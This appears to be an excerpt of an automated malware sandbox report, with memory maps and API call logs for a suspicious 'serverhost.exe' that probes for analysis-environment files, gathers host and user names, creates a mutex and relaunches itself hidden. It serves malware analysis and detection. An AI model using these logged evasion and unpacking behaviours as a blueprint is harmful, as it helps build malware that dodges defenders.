| private_0x0000000000870000 | 0x00870000 | 0x008affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000008b0000 | 0x008b0000 | 0x009affff | Private Memory | Readable, Writable |
|
|
|
|
| serverhost.exe | 0x009e0000 | 0x009fafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000a00000 | 0x00a00000 | 0x015fffff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000001600000 | 0x01600000 | 0x019f2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| sortdefault.nls | 0x01a00000 | 0x01ccefff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000001cd0000 | 0x01cd0000 | 0x01d17fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001e30000 | 0x01e30000 | 0x01f2ffff | Private Memory | Readable, Writable |
|
|
|
|
| imageres.dll | 0x6d1b0000 | 0x6e505fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| apphelp.dll | 0x711a0000 | 0x711ebfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| comctl32.dll | 0x71b80000 | 0x71c03fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imageres.dll | 0x71c90000 | 0x72fe5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntmarta.dll | 0x73790000 | 0x737b0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| windowscodecs.dll | 0x73a40000 | 0x73b3afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| uxtheme.dll | 0x73ea0000 | 0x73edffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| propsys.dll | 0x73ee0000 | 0x73fd4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| comctl32.dll | 0x74020000 | 0x741bdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x74f70000 | 0x74f8afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x74f90000 | 0x74f9bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| profapi.dll | 0x75040000 | 0x7504afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| devobj.dll | 0x75150000 | 0x75161fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x751a0000 | 0x751e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cfgmgr32.dll | 0x75310000 | 0x75336fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x75340000 | 0x753dffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x753e0000 | 0x7546efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wldap32.dll | 0x754a0000 | 0x754e4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x754f0000 | 0x75590fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x756a0000 | 0x7573cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shell32.dll | 0x75740000 | 0x76389fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x76390000 | 0x7645bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76500000 | 0x765d3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x767fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76800000 | 0x7695bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76970000 | 0x769f2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76bc0000 | 0x76bc9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x76bd0000 | 0x76c98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| setupapi.dll | 0x76ca0000 | 0x76e3cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x76e40000 | 0x76eebfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x76ef0000 | 0x7702bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x77030000 | 0x77048fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x77060000 | 0x770b6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x770d0000 | 0x7711dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| apisetschema.dll | 0x77130000 | 0x77130fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007ffd4000 | 0x7ffd4000 | 0x7ffd4fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = USER32.dll, base_address = 0x76bd0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = ReleaseCapture, address_out = 0x76c069f2 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetProcessWindowStation, address_out = 0x76bddfdc |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetCaretBlinkTime, address_out = 0x76be0d01 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x2ef4bc |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x2ef4dc |
|
1 | |
| Module | Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x2ef5bc |
|
1 | |
| Module | Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x2ef5bc |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x2ef5bc |
|
1 | |
| Module | Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x2ef5bc |
|
1 | |
| Module | Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x2ef5bc |
|
1 | |
| Module | Get Address | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x2ef5bc |
|
1 | |
| Module | Get Address | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x2ef5bc |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x76500000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleFileNameA, address_out = 0x765533f6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetComputerNameA, address_out = 0x76536ba9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CloseHandle, address_out = 0x7654ca7c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrcmpA, address_out = 0x76538c59 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FreeConsole, address_out = 0x765abfde |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetComputerNameExA, address_out = 0x7658f41f |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleA, address_out = 0x7654cf41 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateFileA, address_out = 0x7654cee8 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x75340000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = GetUserNameA, address_out = 0x7536a4b4 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x77060000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shlwapi.dll, function = StrStrIA, address_out = 0x7706d250 |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x76ef0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = strchr, address_out = 0x76f37690 |
|
1 | |
| System | Get Computer Name | result_out = F71GWAT |
|
1 | |
| System | Get Computer Name | result_out = F71gwat, type = ComputerNameDnsHostname |
|
1 | |
| File | Create | filename = C:\email.doc, desired_access = GENERIC_READ |
|
1 | |
| File | Create | filename = C:\a\foobar.bmp, desired_access = GENERIC_READ |
|
1 | |
| Module | Get Handle | module_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, base_address = 0x9e0000 |
|
1 | |
| Module | Get Filename | module_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 259 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x76500000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = WTSGetActiveConsoleSessionId, address_out = 0x7653480b |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 |
|
1 | |
| Mutex | Create | mutex_name = MA991ED3B |
|
1 | |
| Process | Create | process_name = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, os_pid = 0x73c, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE |
|
1 |
| Information | Value |
|---|---|
| ID | #16 |
| File Name | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe |
| Command Line | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:00, Reason: Child Process |
| Unmonitor | End Time: 00:02:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:25 |
| Information | Value |
|---|---|
| PID | 0x73c |
| Parent PID | 0x744 (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
780
0x
560
0x
330
0x
338
0x
510
0x
51C
0x
524
0x
50C
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000040000 | 0x00040000 | 0x00040fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00056fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00061fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000070000 | 0x00070000 | 0x0016ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000170000 | 0x00170000 | 0x00170fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000180000 | 0x00180000 | 0x0027ffff | Private Memory | Readable, Writable |
|
|
|
|
| locale.nls | 0x00280000 | 0x002e6fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x00000000002f0000 | 0x002f0000 | 0x003b7fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000003c0000 | 0x003c0000 | 0x003c1fff | Pagefile Backed Memory | Readable |
|
|
|
|
| windowsshell.manifest | 0x003d0000 | 0x003d0fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x00000000003d0000 | 0x003d0000 | 0x003d0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000003d0000 | 0x003d0000 | 0x003d0fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000003e0000 | 0x003e0000 | 0x003e1fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000003f0000 | 0x003f0000 | 0x003fffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000400000 | 0x00400000 | 0x00400fff | Pagefile Backed Memory | Readable |
|
|
|
|
| cversions.1.db | 0x00410000 | 0x00413fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000410000 | 0x00410000 | 0x00418fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000410000 | 0x00410000 | 0x0041cfff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000420000 | 0x00420000 | 0x00420fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000430000 | 0x00430000 | 0x0043ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000440000 | 0x00440000 | 0x00540fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000550000 | 0x00550000 | 0x00942fff | Pagefile Backed Memory | Readable |
|
|
|
|
| rpcss.dll | 0x00950000 | 0x009abfff | Memory Mapped File | Readable |
|
|
|
|
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db | 0x00950000 | 0x0096cfff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000970000 | 0x00970000 | 0x00993fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000970000 | 0x00970000 | 0x00981fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000990000 | 0x00990000 | 0x009a1fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000009a0000 | 0x009a0000 | 0x009c3fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000009b0000 | 0x009b0000 | 0x009c1fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000009d0000 | 0x009d0000 | 0x009d8fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000009d0000 | 0x009d0000 | 0x009dcfff | Private Memory | Readable, Writable |
|
|
|
|
| serverhost.exe | 0x009e0000 | 0x009fafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000a00000 | 0x00a00000 | 0x015fffff | Pagefile Backed Memory | Readable |
|
|
|
|
| sortdefault.nls | 0x01600000 | 0x018cefff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x00000000018d0000 | 0x018d0000 | 0x019aefff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000019b0000 | 0x019b0000 | 0x01aaffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001ab0000 | 0x01ab0000 | 0x01b9ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001ab0000 | 0x01ab0000 | 0x01af7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001b00000 | 0x01b00000 | 0x01b47fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001b50000 | 0x01b50000 | 0x01b5ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000001b50000 | 0x01b50000 | 0x01b53fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000001b50000 | 0x01b50000 | 0x01b51fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000001b60000 | 0x01b60000 | 0x01b9ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001ba0000 | 0x01ba0000 | 0x01c9ffff | Private Memory | Readable, Writable |
|
|
|
|
| serverhost.exe | 0x01ca0000 | 0x01cb6fff | Memory Mapped File | Readable |
|
|
|
|
| rsaenh.dll | 0x01ca0000 | 0x01cdbfff | Memory Mapped File | Readable |
|
|
|
|
| rsaenh.dll | 0x01ca0000 | 0x01cdbfff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000001ca0000 | 0x01ca0000 | 0x01ca3fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| index.dat | 0x01ca0000 | 0x01caffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| index.dat | 0x01cb0000 | 0x01cb7fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| index.dat | 0x01cc0000 | 0x01ccffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000001cd0000 | 0x01cd0000 | 0x01cd0fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000001cd0000 | 0x01cd0000 | 0x01cd0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000001ce0000 | 0x01ce0000 | 0x01ceffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001d40000 | 0x01d40000 | 0x01e3ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001e40000 | 0x01e40000 | 0x01f3ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001f40000 | 0x01f40000 | 0x01fcffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001fd0000 | 0x01fd0000 | 0x0205ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002060000 | 0x02060000 | 0x0215ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002160000 | 0x02160000 | 0x021effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000021f0000 | 0x021f0000 | 0x022effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002320000 | 0x02320000 | 0x0241ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002420000 | 0x02420000 | 0x0261ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000025c0000 | 0x025c0000 | 0x026bffff | Private Memory | Readable, Writable |
|
|
|
|
| imageres.dll | 0x6bc60000 | 0x6cfb5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imageres.dll | 0x6bd90000 | 0x6d0e5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imageres.dll | 0x6cfc0000 | 0x6e315fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imageres.dll | 0x6d0f0000 | 0x6e445fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rasapi32.dll | 0x6e320000 | 0x6e371fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rasadhlp.dll | 0x6f6f0000 | 0x6f6f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| apphelp.dll | 0x711a0000 | 0x711ebfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| comctl32.dll | 0x71b80000 | 0x71c03fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rasman.dll | 0x71c90000 | 0x71ca4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winrnr.dll | 0x71ce0000 | 0x71ce7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pnrpnsp.dll | 0x71cf0000 | 0x71d01fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| napinsp.dll | 0x71d10000 | 0x71d1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sensapi.dll | 0x72570000 | 0x72575fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| fwpuclnt.dll | 0x73240000 | 0x73277fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winnsi.dll | 0x73350000 | 0x73356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| iphlpapi.dll | 0x73360000 | 0x7337bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nlaapi.dll | 0x73480000 | 0x7348ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntmarta.dll | 0x73790000 | 0x737b0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rtutils.dll | 0x737c0000 | 0x737ccfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x73a20000 | 0x73a2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| windowscodecs.dll | 0x73a40000 | 0x73b3afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| uxtheme.dll | 0x73ea0000 | 0x73edffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| propsys.dll | 0x73ee0000 | 0x73fd4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| comctl32.dll | 0x74020000 | 0x741bdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wshtcpip.dll | 0x74620000 | 0x74624fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| userenv.dll | 0x746f0000 | 0x74706fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x748b0000 | 0x748eafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dnsapi.dll | 0x74990000 | 0x749d3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wship6.dll | 0x74ac0000 | 0x74ac5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mswsock.dll | 0x74ad0000 | 0x74b0bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x74b10000 | 0x74b25fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x74f70000 | 0x74f8afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x74f90000 | 0x74f9bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| profapi.dll | 0x75040000 | 0x7504afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msasn1.dll | 0x750b0000 | 0x750bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| devobj.dll | 0x75150000 | 0x75161fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x751a0000 | 0x751e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| crypt32.dll | 0x751f0000 | 0x7530cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cfgmgr32.dll | 0x75310000 | 0x75336fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x75340000 | 0x753dffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x753e0000 | 0x7546efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wldap32.dll | 0x754a0000 | 0x754e4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x754f0000 | 0x75590fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wininet.dll | 0x755a0000 | 0x75694fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x756a0000 | 0x7573cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shell32.dll | 0x75740000 | 0x76389fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x76390000 | 0x7645bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x76460000 | 0x76494fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76500000 | 0x765d3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| iertutil.dll | 0x765e0000 | 0x767dafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x767fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76800000 | 0x7695bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| normaliz.dll | 0x76960000 | 0x76962fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76970000 | 0x769f2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| urlmon.dll | 0x76a80000 | 0x76bb5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76bc0000 | 0x76bc9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x76bd0000 | 0x76c98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| setupapi.dll | 0x76ca0000 | 0x76e3cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x76e40000 | 0x76eebfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x76ef0000 | 0x7702bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x77030000 | 0x77048fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x77060000 | 0x770b6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x770c0000 | 0x770c5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x770d0000 | 0x7711dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| apisetschema.dll | 0x77130000 | 0x77130fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffd8fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007ffd9000 | 0x7ffd9000 | 0x7ffd9fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = USER32.dll, base_address = 0x76bd0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = ReleaseCapture, address_out = 0x76c069f2 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetProcessWindowStation, address_out = 0x76bddfdc |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetCaretBlinkTime, address_out = 0x76be0d01 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x16f31c |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x16f33c |
|
1 | |
| Module | Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x16f41c |
|
1 | |
| Module | Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x16f41c |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x16f41c |
|
1 | |
| Module | Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x16f41c |
|
1 | |
| Module | Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x16f41c |
|
1 | |
| Module | Get Address | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x16f41c |
|
1 | |
| Module | Get Address | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x16f41c |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x76500000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleFileNameA, address_out = 0x765533f6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetComputerNameA, address_out = 0x76536ba9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CloseHandle, address_out = 0x7654ca7c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrcmpA, address_out = 0x76538c59 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FreeConsole, address_out = 0x765abfde |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetComputerNameExA, address_out = 0x7658f41f |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleA, address_out = 0x7654cf41 |
|
1 | |
